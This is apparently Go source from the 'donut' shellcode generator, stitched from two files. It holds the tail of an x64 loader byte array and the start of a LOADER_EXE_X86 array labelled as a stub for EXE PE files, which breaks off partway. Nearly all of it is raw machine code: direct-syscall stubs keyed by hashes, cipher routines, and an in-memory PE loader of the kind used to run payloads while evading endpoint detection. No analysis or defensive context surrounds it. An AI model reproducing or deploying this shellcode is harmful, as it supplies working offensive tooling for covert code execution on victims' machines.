2288 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x89, 0x4d, 0x10,
2289 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8,
2290 0xff, 0xff, 0xff, 0xff, 0xeb, 0x49, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
2291 0xc1, 0xe8, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff,
2292 0xff, 0xff, 0xff, 0xeb, 0x32, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00,
2293 0xeb, 0x19, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0,
2294 0x04, 0x39, 0x45, 0x10, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x14, 0x83,
2295 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x00, 0x39, 0x45, 0xfc,
2296 0x72, 0xdc, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x30, 0x5d,
2297 0xc3, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x27, 0x6e, 0x95, 0x32,
2298 0x48, 0x8b, 0x54, 0x24, 0x60, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x7b, 0xff,
2299 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
2300 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41,
2301 0x50, 0x41, 0x51, 0xb9, 0x0d, 0x22, 0x5e, 0x03, 0x48, 0x8b, 0x54, 0x24,
2302 0x78, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x4f, 0xff, 0xff, 0xff, 0x48, 0x83,
2303 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2304 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2305 0x42, 0xb8, 0xce, 0x9a, 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2306 0x25, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2307 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2308 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x53, 0x91, 0x98, 0xf2, 0x4c, 0x89,
2309 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xfb, 0xfe, 0xff, 0xff, 0x48, 0x83,
2310 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2311 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2312 0xd1, 0xd6, 0x9d, 0x34, 0x48, 0x89, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2313 0xd1, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2314 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2315 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x23, 0xe1, 0xbd, 0xe3, 0x4c, 0x89,
2316 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xa7, 0xfe, 0xff, 0xff, 0x48, 0x83,
2317 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2318 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2319 0x17, 0x15, 0x91, 0x0b, 0x48, 0x8b, 0x54, 0x24, 0x50, 0x48, 0x83, 0xec,
2320 0x28, 0xe8, 0x7b, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59,
2321 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f,
2322 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x15, 0x42, 0xb7, 0x1c,
2323 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x51, 0xfe, 0xff, 0xff,
2324 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89,
2325 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41,
2326 0x51, 0xb9, 0x4b, 0x47, 0xa5, 0x31, 0x48, 0x8b, 0x54, 0x24, 0x58, 0x48,
2327 0x83, 0xec, 0x28, 0xe8, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28,
2328 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3,
2329 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0xef, 0x7f,
2330 0x90, 0x87, 0x48, 0x8b, 0x54, 0x24, 0x48, 0x48, 0x83, 0xec, 0x28, 0xe8,
2331 0xf9, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2332 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2333 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x2a, 0xfe, 0x9d, 0x24, 0x48, 0x8b,
2334 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xca,
2335 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a,
2336 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52,
2337 0x41, 0x50, 0x41, 0x51, 0xb9, 0x39, 0x2b, 0xcf, 0x55, 0x48, 0x8b, 0x54,
2338 0x24, 0x58, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x9e, 0xfd, 0xff, 0xff, 0x48,
2339 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca,
2340 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
2341 0xb9, 0x93, 0x76, 0x29, 0x34, 0x48, 0x8b, 0x94, 0x24, 0x80, 0x00, 0x00,
2342 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x6f, 0xfd, 0xff, 0xff, 0x48, 0x83,
2343 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2344 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2345 0xf7, 0xc9, 0xac, 0xff, 0x4c, 0x89, 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8,
2346 0x45, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2347 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x90,
2348 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2349 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2350 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00,
2351 0x00, 0x00, 0x00, 0xeb, 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85,
2352 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b,
2353 0x10, 0x8b, 0x45, 0xfc, 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01,
2354 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
2355 0x00, 0xeb, 0x5e, 0x8b, 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b,
2356 0x45, 0xdc, 0x01, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8,
2357 0x8b, 0x45, 0xdc, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31,
2358 0xd0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45,
2359 0xe4, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33,
2360 0x45, 0xfc, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89,
2361 0xc2, 0x8b, 0x45, 0xec, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8,
2362 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc,
2363 0x01, 0x83, 0x7d, 0xfc, 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48,
2364 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
2365 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
2366 0x10, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45,
2367 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00,
2368 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9,
2369 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01,
2370 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40,
2371 0x75, 0x73, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc2,
2372 0x48, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xc8, 0x41, 0x89,
2373 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x5e, 0xf5,
2374 0xff, 0xff, 0x8b, 0x45, 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d,
2375 0xf0, 0x0b, 0x76, 0x2b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
2376 0x48, 0x89, 0xc1, 0xe8, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8,
2377 0x48, 0x8d, 0x45, 0xd0, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00,
2378 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x25, 0xf5, 0xff, 0xff, 0x8b,
2379 0x45, 0xf4, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10,
2380 0x00, 0x00, 0x00, 0x83, 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4,
2381 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2,
2382 0x8b, 0x45, 0xf0, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83,
2383 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55,
2384 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff,
2385 0xff, 0x48, 0x31, 0x45, 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2386 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b,
2387 0x45, 0xf8, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90,
2388 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2389 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2390 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10,
2391 0x48, 0x89, 0x45, 0xe8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
2392 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
2393 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xfc,
2394 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8,
2395 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c, 0x8d, 0x04, 0x85,
2396 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c, 0x01, 0xc0, 0x31,
2397 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
2398 0xb8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00,
2399 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2400 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89,
2401 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1,
2402 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b,
2403 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b,
2404 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0,
2405 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2406 0xc0, 0x08, 0x01, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2407 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x48, 0x8b, 0x45,
2408 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2409 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2410 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2411 0x04, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x01,
2412 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10,
2413 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00,
2414 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0,
2415 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x0d, 0x89, 0xc1, 0x48,
2416 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2417 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2418 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
2419 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2420 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2421 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08,
2422 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
2423 0x0f, 0x0f, 0x86, 0xda, 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2424 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00,
2425 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08,
2426 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
2427 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c,
2428 0x8d, 0x04, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c,
2429 0x01, 0xc0, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d,
2430 0xfc, 0x03, 0x76, 0xb8, 0x90, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
2431 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
2432 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28,
2433 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18,
2434 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xc1, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
2435 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45,
2436 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x88, 0x54,
2437 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe2,
2438 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
2439 0xa0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x28, 0xba, 0x10, 0x00, 0x00, 0x00,
2440 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xe4, 0xc7, 0x45, 0xf4, 0x00,
2441 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xf8,
2442 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x08, 0x8b, 0x45, 0xf4, 0x0f, 0xb6, 0x54,
2443 0x05, 0xd0, 0x44, 0x8b, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0xf8, 0x4c, 0x01,
2444 0xc0, 0x31, 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4,
2445 0x3b, 0x45, 0xe4, 0x72, 0xd0, 0x8b, 0x45, 0xe4, 0x29, 0x45, 0x28, 0x8b,
2446 0x45, 0xe4, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00,
2447 0x00, 0xeb, 0x24, 0x8b, 0x45, 0xf4, 0x83, 0xe8, 0x01, 0x89, 0xc2, 0x48,
2448 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x83, 0xc2, 0x01,
2449 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02, 0xeb, 0x0b, 0x83,
2450 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85, 0xc0, 0x7f, 0xd5, 0x83, 0x7d,
2451 0x28, 0x00, 0x0f, 0x85, 0x35, 0xff, 0xff, 0xff, 0x90, 0x90, 0x48, 0x83,
2452 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
2453 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
2454 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
2455 0x00, 0x00, 0x00, 0x00};
2456
0 package donut
1
2 // LOADER_EXE_X86 - stub for EXE PE files
3 var LOADER_EXE_X86 = []byte{
4
5 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec, 0x10, 0x03, 0x00, 0x00, 0xc7,
6 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c,
7 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x83,
8 0xf6, 0x00, 0x89, 0xf1, 0x89, 0xd0, 0x80, 0xf4, 0x00, 0x89, 0xc3, 0x89,
9 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x8b,
10 0x45, 0x08, 0x8b, 0x50, 0x74, 0x8b, 0x40, 0x70, 0x89, 0x45, 0xe8, 0x89,
11 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89,
12 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55,
13 0xec, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08,
14 0x89, 0x04, 0x24, 0xe8, 0xb2, 0x11, 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83,
15 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0x98, 0x00, 0x00, 0x00, 0xe8, 0x8e, 0x50,
16 0x00, 0x00, 0xba, 0xa4, 0x11, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
17 0x29, 0xca, 0x01, 0xd0, 0x89, 0xc2, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
18 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
19 0x08, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
20 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
21 0x8b, 0x45, 0xe4, 0xff, 0xd0, 0x83, 0xec, 0x18, 0x89, 0x45, 0xf4, 0x8b,
22 0x45, 0x08, 0x8b, 0x90, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00,
23 0x00, 0x00, 0x89, 0x45, 0xe8, 0x89, 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b,
24 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24,
25 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x89, 0x44, 0x24, 0x04, 0x89,
26 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1c, 0x11,
27 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xdc, 0x00, 0x0f, 0x84, 0x83,
28 0x00, 0x00, 0x00, 0xeb, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x7d,
29 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x74, 0x83, 0x7d, 0xe0, 0x00, 0x74, 0x6e,
30 0xc7, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x07, 0x00, 0x01, 0x00, 0x8b, 0x45,
31 0xe0, 0xff, 0xd0, 0x8d, 0x95, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
32 0x04, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xd8, 0xff, 0xd0, 0x83, 0xec, 0x08,
33 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08,
34 0x02, 0x00, 0x00, 0x89, 0x85, 0xc4, 0xfd, 0xff, 0xff, 0x8b, 0x85, 0xd0,
35 0xfd, 0xff, 0xff, 0x83, 0xe0, 0xfc, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff,
36 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd,
37 0xff, 0xff, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xdc, 0xff, 0xd0, 0x83, 0xec,
38 0x08, 0xeb, 0x0b, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0x00,
39 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8d, 0x65, 0xf8, 0x5b, 0x5e, 0x5d, 0xc3,
40 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec, 0xbc, 0x01, 0x00, 0x00,
41 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x4c, 0x8b, 0x40, 0x48, 0x89, 0x45, 0xd0,
42 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
43 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
44 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
45 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3d, 0x10, 0x00, 0x00, 0x89, 0x45, 0xcc,
46 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x54, 0x8b, 0x40, 0x50, 0x89, 0x45, 0xd0,
47 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
48 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
49 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
50 0x08, 0x89, 0x04, 0x24, 0xe8, 0x01, 0x10, 0x00, 0x00, 0x89, 0x45, 0xc8,
51 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xc4, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xc0,
52 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08,
53 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54,
54 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b, 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04,
55 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbf,
56 0x0f, 0x00, 0x00, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xcc, 0x00, 0x74, 0x0c,
57 0x83, 0x7d, 0xc8, 0x00, 0x74, 0x06, 0x83, 0x7d, 0xc4, 0x00, 0x75, 0x0a,
58 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x8d, 0x07, 0x00, 0x00, 0x8b, 0x45,
59 0x08, 0x8b, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7,
60 0x44, 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0xc7,
